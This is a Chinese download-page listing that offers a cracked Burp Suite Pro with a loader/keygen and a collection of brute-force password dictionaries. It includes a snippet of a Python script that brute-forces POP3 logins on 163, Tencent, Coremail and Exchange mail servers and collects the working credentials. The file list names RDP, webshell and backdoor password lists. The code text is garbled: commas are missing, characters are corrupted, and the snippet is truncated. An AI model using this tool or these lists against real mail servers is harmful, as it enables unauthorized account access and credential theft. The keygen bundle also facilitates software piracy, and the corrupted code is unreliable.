資源簡(jiǎn)介
因?yàn)樽约簩W(xué)習(xí)的時(shí)候,搞了好久,浪費(fèi)了很長(zhǎng)時(shí)間。分享一一個(gè)打包好的Burp和字典
Burp爆破 密碼字典
代碼片段和文件信息
#!usr/bin/python?
#!coding:utf-8?
import?threadingtimerandomsyspoplib?
from?copy?import?copy?
if?len(sys.argv)?!=4:?
????print?“\t????Note:?郵箱類型為:‘163‘‘tencent‘‘coremail‘‘236‘‘exchange‘?\n“?
????print?“\t????Note:?coremail|exchange?用戶字典不需要域名后綴,例如zhangsan\n“?
????print?“\t????Note:?163|tencent|236?用戶字典需要域名后綴,例如zhangsan@domain.com\n“?
????print?“\t????Usage:?163|tencent使用方法:./mail.py?type??\n“?
????print?“\t????Usage:?236|exchange|coremail使用方法:./mail.py?type???mail.domain.com\n“???
????sys.exit(1)?
mailType=[‘163‘‘tencent‘‘coremail‘‘236‘‘exchange‘]?
if?sys.argv[1]?in?[‘236‘‘exchange‘‘coremail‘]:?
????try:?
????????server?=?sys.argv[5]?
????except:?
????????print?‘[-]?Error:?236|exchange|coremail需要指定domain.com,請(qǐng)參考使用說(shuō)明!\n‘?
????????sys.exit(1)?
elif?sys.argv[1]?==?‘163‘:?
????server?=?“pop.qiye.163.com“?
elif?sys.argv[1]?==?‘tencent‘:?
????server?=?“pop.exmail.qq.com“?
else?:?
????print?“[-]?Error:?郵箱類型錯(cuò)誤\n“?
????sys.exit(1)?
?????
success?=?[]?
try:?
????users_list?=?open(sys.argv[2]?“r“)?
????users?=?users_list.readlines()?
????words_list?=?open(sys.argv[3]?“r“)?
????words?=?words_list.readlines()?
except(IOError):?
????print?“[-]?Error:?請(qǐng)檢查用戶名或密碼路徑及文件\n“?
????sys.exit(1)?
finally:?
????users_list.close()?
????words_list.close()?
?????
try:?
????if?sys.argv[1]?in?[‘163‘‘236‘]:?
????????pop?=?poplib.POP3(server110)?????????
????else:?
????????pop?=?poplib.POP3_SSL(server995)?
????welcome?=?pop.getwelcome()?
????print?welcome?
????pop.quit()?
except?(poplib.error_proto):?
????welcome?=?“[-]?Error:?No?ResponseSomething?wrong!!!\n“?
????sys.exit(1)?
print?“[+]?Server:“server?
print?“[+]?Users?Loaded:“l(fā)en(users)?
print?“[+]?Words?Loaded:“l(fā)en(words)?
print?“[+]?Server?response:“welcome“\n“?
def?mailbruteforce(listuserlistpwdtype):?
????if?len(listuser)?1?or?len(listpwd)?1?:?
????????print?“[-]?Error:?An?error?occurred:?No?user?or?pass?list\n“?
????????return?1?
?????
????for?user?in?listuser:?
????????for?passwd?in?listpwd?:?
????????????user?=?user.replace(“\n“““)?
????????????passwd?=?passwd.replace(“\n“““)?
?????????????
????????????try:?
????????????????print?“-“*12?
????????????????print?“[+]?User:“user“Password:“passwd?
?????????????????
#?????????????????time.sleep(0.1)???????
????????????????if?type?in?[‘163‘‘236‘]:?
????????????????????popserver?=?poplib.POP3(server110)?????????
????????????????else:?
????????????????????popserver?=?poplib.POP3_SSL(server995)?
????????????????popserver.user(user)?
????????????????auth?=?popserver.pass_(passwd)?
????????????????print?auth?
?????????????????
????????????????if?auth.split(‘?‘)[0]?==?“+OK“?or?auth?==“+OK“:?
????????????????????ret?=?(userpasswdpopserver.stat()[0]popserver.stat()[1])?
????????????????????success.append(ret)?
????????????????????#print?len(success)?
????????????????????popserver.quit()?
????????????????????break?
????????????????else?:?
????????????????????popserver.quit()?
????????????????????co
?屬性????????????大小?????日期????時(shí)間???名稱
-----------?---------??----------?-----??----
?????目錄???????????0??2019-11-01?14:12??爆破\
?????目錄???????????0??2019-11-02?12:48??爆破\burpsuite\
?????目錄???????????0??2019-11-02?12:46??爆破\burpsuite\Burp_Suite_Pro_v1.7.32_Loader_Keygen\
?????文件???????65220??2018-01-25?17:01??爆破\burpsuite\Burp_Suite_Pro_v1.7.32_Loader_Keygen\burp-loader-keygen.jar
?????文件????27955758??2018-02-03?10:02??爆破\burpsuite\Burp_Suite_Pro_v1.7.32_Loader_Keygen\burpsuite_pro_v1.7.32.jar
?????文件??????192568??2019-10-26?11:15??爆破\burpsuite\Burp_Suite_Pro_v1.7.32_Loader_Keygen\java.exe
?????文件??????????12??2019-11-02?12:44??爆破\burpsuite\Burp_Suite_Pro_v1.7.32_Loader_Keygen\readme.txt
?????文件??????????32??2019-11-02?12:46??爆破\burpsuite\Burp_Suite_Pro_v1.7.32_Loader_Keygen\run.bat
?????目錄???????????0??2019-11-02?12:42??爆破\字典\
?????目錄???????????0??2019-11-02?12:33??爆破\字典\Blasting_dictionary-master\
?????文件????????2344??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\3389爆破字典.txt
?????文件????????5176??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\NT密碼.txt
?????文件??????????35??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\README.md
?????文件????????3637??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\baopo.py
?????文件??????????54??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\big_dictionary.txt
?????文件?????????500??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\jiahouzhui.py
?????文件???????18284??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\liunx_users_dictionaries.txt
?????文件????????8846??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\renkoutop.txt
?????文件????????1015??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\top100password.txt
?????文件?????9273839??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\top10W.txt
?????文件???????22534??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\top500姓名組合.txt
?????文件?????????134??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\weblogic默認(rèn)密碼列表.txt
?????文件??????144194??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\webshellPassword.txt
?????目錄???????????0??2019-11-02?12:33??爆破\字典\Blasting_dictionary-master\各類黑客大牛后門密碼\
?????文件???????12865??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\各類黑客大牛后門密碼\各類黑客大牛后門密碼.txt
?????文件???????40710??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\后臺(tái)路徑.txt
?????文件????????2107??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\字典.txt
?????文件???????62027??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\常用密碼.txt
?????文件???????71357??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\常用用戶名.txt
?????目錄???????????0??2019-11-02?12:33??爆破\字典\Blasting_dictionary-master\常用英文用戶名和奇葩密碼\
?????文件??????700728??2017-11-15?15:30??爆破\字典\Blasting_dictionary-master\常用英文用戶名和奇葩密碼\passwords.txt
............此處省略91個(gè)文件信息
評(píng)論
共有 條評(píng)論